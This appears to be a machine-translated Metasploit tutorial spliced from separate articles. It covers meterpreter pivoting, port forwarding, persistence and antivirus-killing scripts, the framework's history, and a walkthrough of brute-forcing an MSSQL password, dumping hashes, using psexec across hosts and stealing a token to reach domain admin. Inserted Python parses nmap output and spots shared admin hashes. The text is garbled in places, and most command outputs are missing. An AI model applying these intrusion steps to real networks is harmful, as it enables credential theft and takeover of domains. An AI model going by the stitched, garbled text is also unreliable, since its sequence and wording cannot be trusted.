So, now let's move on to the most delicious part - post-exploitation and meterpreter. I bet you are familiar with the meterpreter, so you can tell how good it is (and after that it doesn’t deprive itself, and works in chroot) and functional (hack-tools installed, modification of the estru ta file system, migration by processes and tokens, routing) I have no problem :).

It is possible that we have been denied access to one of the computers (192.168.146.129) in the corporate network and we (192.168.0.102) want to expand our success - scan the subscriber and so on.

Add a route (subnet, mask, session for routing) in msfconsol:

msf> route add 192.168.146.0 255.255.255.0 1

It’s a pity that nmap didn’t want to take this route quickly – perhaps the integration isn’t that deep yet. You can calmly (without any special settings) use basic modules, layers and scanners to develop an attack (amazing little ones) - MSF takes over all the routing.

Since the existing hosts may have access to the external network (as we know), then to communicate with them you can use portforwarding on an already spent victim, fortunately, meterpreter means:

meterpreter> portfwd add -l 8008 -p 2222 -r 192.168.0.101

Now in the payloads of the exploits we specify LHOST=192.168.146.129, LPORT=8008, and everything works perfectly.

Meterpreter has an amazing feature: automation of actions with Ruby scripts. This is really cool. You can find the available scripts in msf3/scripts/meterpreter; while in a session, type run and press Tab twice (for those not in the know :)). You can run scripts either manually with the run command, or by setting the AutoRunScript or InitialAutoRunScript variables when configuring the exploit/handler. The latter runs before the shell is launched, the former after.

Many scripts are already included in the installation; among the most standard ones:

  • winenum - quickly collects all information about the system, from the network to the installed software and hashes;
  • persistence, metsvc - register meterpreter for autostart in the registry or as a service;
  • getcountermeasure - disables the firewall and can kill the processes of various antiviruses and firewalls.

Conclusion

In this article I tried to describe Metasploit in a new way (unusual for Russian-language sources) and at all stages of a compromise, so I hope it turns out useful for you. In addition, a couple of brilliant ideas were born that were never implemented, and a number of strange bugs were discovered in MSF, which, I suspect, will be fixed before this issue comes out. On the whole, working with it is wonderful!

Tips:

  • msfconsole performs auto-completion when you press Tab, and all commands support the help parameter "-h".
  • If you want to abort a command: Ctrl+C; to send it to the background: Ctrl+Z.
  • To copy text in cygwin, use the left/right mouse button; to paste, Shift+Insert.
  • Under Windows, you have access to the msfcli, msfpayload, etc. interfaces through the cygwin console. Test it carefully, since not all functions work adequately there.

A practical guide to the Kali Linux distribution for information security auditing and penetration testing. Today I will focus on one of the tools included in this distribution: Metasploit Framework. Let's take a look at the history of the project, and we will provide links and documentation that will help with practical mastery of the Metasploit package.

History of the project

In 2003, a hacker known as "HD Moore" came up with the idea of developing a tool for quickly writing and using exploits. Thus the project known to everyone as the Metasploit Project was born.

The first version of the framework was written in Perl, with a pseudo-graphical interface built on the curses library. At that time it was simply a collection of disparate exploits and scripts, with general information about them stored in a single database. Information about the environment needed to run the scripts was usually not available. They also carried a bunch of outdated code and required modifications to hard-coded settings for each specific case, which complicated the working process and the development of new tools.

Work on the second (2.x) version was done by HD Moore, Matt Miller and just a few volunteers. The third version was completely rewritten in Ruby, and was developed by Metasploit LLC (founded by the same developers in 2006). A year later, in 2008, the Metasploit Framework license was changed from proprietary to BSD. And later, in 2009, the company Rapid7, which deals with vulnerability management, announced the acquisition of Metasploit, a software package for conducting penetration tests. It was also announced that the non-commercial version of the utility would, as before, remain available to everyone.

Since the acquisition, a lot has changed in the framework.

PRO and Community versions appeared, and in 2010 a simplified version was released for "low-skilled" users: Metasploit Express.

Versions

Today Metasploit is distributed in four versions:

  • Framework - the basic version with a console interface;
  • Community - a free version that includes a web interface and part of the functionality of the commercial versions;
  • Express - for commercial clients, includes functionality that allows you to easily carry out basic audits and generate reports on them;
  • Pro - the most advanced version, provides extended capabilities for carrying out attacks, allows you to build audit task chains, generate reports and much more.

In addition to the web interface available in the Community, Express and Pro versions, there are projects such as Armitage and Cobalt Strike that provide a friendly and intuitive GUI for the framework.

Armitage graphical shell

Unlike other interfaces, Armitage allows you to visualise all stages of an attack, including: scanning network nodes, analysing vulnerable resources, selecting exploits and gaining full control over the attacked system.

All functions of the program are structured and accessible from its menus and tabs, so even a beginner in computer security can get started. The program is intended for use on Linux and Windows platforms. The developer's website provides the source code and reference guides in text and video format.

Basic concepts

1. Database

Before starting to work with the package, you should consider the ability of the database to store information about hosts, services, vulnerabilities, etc. Connecting to the database is not mandatory for the functioning of the framework, but it significantly increases productivity.

Metasploit uses PostgreSQL, so you will need to install the DBMS on your system before using it. Then check that the required DB and framework services are running.

2. Framework structure

The "heart" of Metasploit is the Rex library. It is needed for general-purpose operations: working with sockets, protocols, text formatting, encoding operations and the like. Built on top of it is MSF Core, which provides the basic functionality of a "low-level" API. This is used by the MSF Base library, which in turn provides an API for plugins, the user interface (both console and graphical), and the loadable modules.

All modules are divided into several types depending on the functionality they provide:

  • Exploit - code that exploits a specific vulnerability on the target system (for example, a stack overflow)
  • Payload - code that runs on the target system after the exploit succeeds (establishes a connection, launches a shell, etc.)
  • Post - code that runs on the system after successful penetration (for example, collects passwords or grabs files)
  • Encoder - tools for obfuscating modules in order to mask them from antiviruses
  • NOP - NOP generators. A NOP is an assembler instruction that does nothing. Used to fill empty space in executable files to bring them to the required size
  • Auxiliary - modules for network scanning, traffic analysis, etc.

3. MSFCONSOLE commands

Despite the availability of graphical interfaces, the most common way to work with Metasploit is still the msfconsole console interface.

Let's take a look at the main commands:

  • use - select a specific module to work with;
  • back - the reverse of use: finish working with the selected module and go back;
  • show - display a list of modules of a given type;
  • set - set the value of a specific option;
  • run - launch the auxiliary module after setting the required options;
  • info - display information about the module;
  • search - find a specific module;
  • check - check whether the target system is vulnerable;
  • sessions - display a list of available sessions.

Metasploit can be used as a penetration testing tool (security audit of IT infrastructure); it consists of numerous utilities that form a platform for implementing a wide range of attacks. I'll show a couple of Metasploit use cases that can serve as a pentest algorithm. Here I use Metasploit to show its power and flexibility. As the attack platform I use Backtrack 5 R2, which has Metasploit already installed. It is also important to note that the PostgreSQL DBMS is running there and accepts connections. The network for the test scenario: 192.168.3.0/24.
Let's get started ;)

1. Open msfconsole and check the status of the database.

Okay, let's talk about workspaces, which Metasploit uses as logical units of information. You can use different workspaces for different pentests or for different locations within one pentest. This way it is easy to import/export data between workspaces.

Within one workspace several data tables are stored, for example hosts, services, vulns, loot and notes.
You can add information to these tables manually, for example adding a host to the hosts table.


You can also add a service to the services table.


To fill these tables automatically you can use db_nmap. You can also use any (your favourite, for example) scanning utility, export its results to an XML file, and then import it into Metasploit. You do this with db_import from inside msfconsole (the list of report formats Metasploit understands is shown below).


Let's scan with nmap.

Let's see what hosts are located in the hosts table after this.


In the services table we can filter out the entries we don't need.

There are a lot of Windows machines, so we use the auxiliary module that scans the SMB version.


You could select one of the hosts with the set command, but we will take the hosts one by one, so it is handy to work with the database. We save the hosts from the services table that have port 445 to a file.
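As an added example (not code from the original article), the following Python does what db_import does for an nmap XML report: it fills hosts and services tables from a constructed (not real) scan of the 192.168.3.0/24 test network, and then filters the services table for port 445, the step used above to build the host list. The XML content, addresses and hostnames are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed nmap XML report (not a real scan), in the format db_import accepts.
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.3.10" addrtype="ipv4"/>
    <hostnames><hostname name="TEST-EMEA-DC-01"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.3.11" addrtype="ipv4"/>
    <hostnames><hostname name="TEST-EMEA-DB-01"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="1043"><state state="open"/><service name="ms-sql-s"/></port>
      <port protocol="tcp" portid="135"><state state="closed"/><service name="msrpc"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.168.3.12" addrtype="ipv4"/></host>
</nmaprun>"""


def import_nmap(xml_text):
    """Build hosts {addr: hostname} and services [{host, proto, port, name}]
    tables, the same kind of records a workspace keeps after db_import."""
    hosts, services = {}, []
    for host in ET.fromstring(xml_text).findall("host"):
        if host.find("status").get("state") != "up":
            continue  # hosts that were down get no rows
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        hn = host.find("hostnames/hostname")
        hosts[addr] = hn.get("name") if hn is not None else ""
        for port in host.findall("ports/port"):
            if port.find("state").get("state") != "open":
                continue  # only open ports become service rows
            svc = port.find("service")
            services.append({"host": addr, "proto": port.get("protocol"),
                             "port": int(port.get("portid")),
                             "name": svc.get("name") if svc is not None else ""})
    return hosts, services


def hosts_with_port(services, port, proto="tcp"):
    """Filter the services table by port (445 for SMB) and return the unique
    host addresses, i.e. the host list saved to a file above."""
    return sorted({s["host"] for s in services
                   if s["port"] == port and s["proto"] == proto})
```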


After scanning, you will see the services table.

We have Windows 2003 hosts, one of them with Windows 2003 Service Pack 1. Most host names and domain names are "TEST".
Information resolved so far (I assume this from the hostnames):
TEST-EMEA-DC-01 - domain controller
TEST-EMEA-DB-01 - database server

Okay, let’s work with a potential database server.

Assuming that the MSSQL DBMS is installed there (since it's Windows...), it should work on port 1433, which is not in the list. I'll "shoot blindly" and try to run the MSSQL check.


Looks like it worked.

Good. We found the MSSQL instance. It runs on port 1043, SQLEXPRESS. The version is 9.00.4035.00, a build corresponding to Microsoft SQL 2005 SP3. Let's look at the services table: what has changed there?

Got it: port 1043 is mssql, plus UDP port 1433, which is the port that mssql really uses.
Now we know the port the database service runs on, and we can organise a brute-force attack, again using Metasploit.

We specify the correct number of the remote port (the DBMS listens on port 1043), the username and the password.

Let's launch and successfully find the password.

OK. Here is the password, and this is our guy's credential. The creds table has been populated.


Time to run an exploit.


We know the name of the client, the password and the port.


Let's get a meterpreter shell.

Let's background this session. Going back to the list of sessions, we see session 1 there.


Next, I'll show the use of various post modules that run after the system has been compromised.

Using smart_hashdump, you can obtain the hashes. I'll set the SESSION and GETSYSTEM parameters.

Launching.


There should be an update to the loot table.
I got SYSTEM privileges and 2 hashes. It appears there is a valid administrator account (the "localadmin" account has RID 500).

Let's look at the loot table.

The table has 3 entries.

I'll check whether the administrator uses this password on other systems. I have everything I need for this.

I'll add the list of hosts from the services table (we saved it earlier).


We won't crack the hash (or will we?), we'll just look at it. Set the parameters BLANK_PASSWORDS and USER_AS_PASS to false.

After launch there are a lot of new entries. Conclusion: the administrator uses one password on several machines on the network.
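The password-reuse conclusion drawn above can be checked programmatically. As an added example (not from the original article), the following Python parses hashdump-format lines (user:RID:LM hash:NT hash:::) collected from several sessions and reports NT hashes shared across hosts, flagging in particular built-in administrator (RID 500) accounts with a common password, which is the finding that unique per-host local administrator passwords remove. The hosts and NT hash values are constructed placeholders; the LM field is the well-known hash of an empty password.

```python
from collections import defaultdict

# Constructed hashdump output per compromised host (placeholder hashes, not real).
# Each line is in pwdump format: user:RID:LM hash:NT hash:::
LOOT = {
    "192.168.3.11": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::",
        "svc_sql:1001:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::",
    ],
    "192.168.3.20": [
        "localadmin:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::",
    ],
    "192.168.3.21": [
        "localadmin:500:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::",
        "helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::",
    ],
}


def parse_hashdump(line):
    """Split one pwdump-format line into its fields (RID as int, hashes lowercased)."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def password_reuse(loot):
    """Return {nt_hash: [(host, user, rid), ...]} for every NT hash seen on more
    than one host. NT hashes are unsalted, so equal hashes mean equal passwords."""
    by_nt = defaultdict(list)
    for host, lines in loot.items():
        for line in lines:
            rec = parse_hashdump(line)
            by_nt[rec["nt"]].append((host, rec["user"], rec["rid"]))
    return {nt: sorted(recs) for nt, recs in by_nt.items()
            if len({host for host, _, _ in recs}) > 1}


def admin_password_reuse(loot):
    """Hosts whose built-in administrator (RID 500) shares its password with
    the RID 500 account of at least one other host: the shared local admin
    password that let one credential open several machines above."""
    hosts = set()
    for recs in password_reuse(loot).values():
        admins = {host for host, _, rid in recs if rid == 500}
        if len(admins) > 1:
            hosts |= admins
    return sorted(hosts)
```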

A few more credentials have been found.


I obtained local passwords to various Windows systems. You could use the psexec exploit, otherwise you would have to go through all the hosts one by one manually, and that is no good.
In exploits you have to set the parameter RHOST, not RHOSTS, so you cannot set a list of hosts to check for vulnerabilities.
I'll show how to automate this process with a script.

This script was put together from various sources on the Internet. You can easily change it and add functionality.

I ran psexec.
However, I couldn't run this whole script as is, because the payload used here is windows/meterpreter/reverse_tcp.
This is where the problem lies: the port I listen on. That's why I use the payload windows/meterpreter/bind_tcp.

I'll launch my script.

The 9th session and the localadmin account have been obtained.

We are still after hashes; now we'll do it the traditional way, by hand, interacting with each session and dumping hashes.
Alternatively, you can use the credential collector module. This module gives us hashes and (importantly!) uses incognito to look for domain tokens. Unfortunately, the module has to be launched manually, step by step, for each session, since, of course, there is no option for doing it in bulk.


I start collecting hashes and tokens.

Sessions 5 and 6 have valid domain tokens.

Try to steal the token and voila: we have access as a domain admin.

This example shows the capabilities of Metasploit and the components of this platform.
PS: Good luck with the undamaged PDA (!#)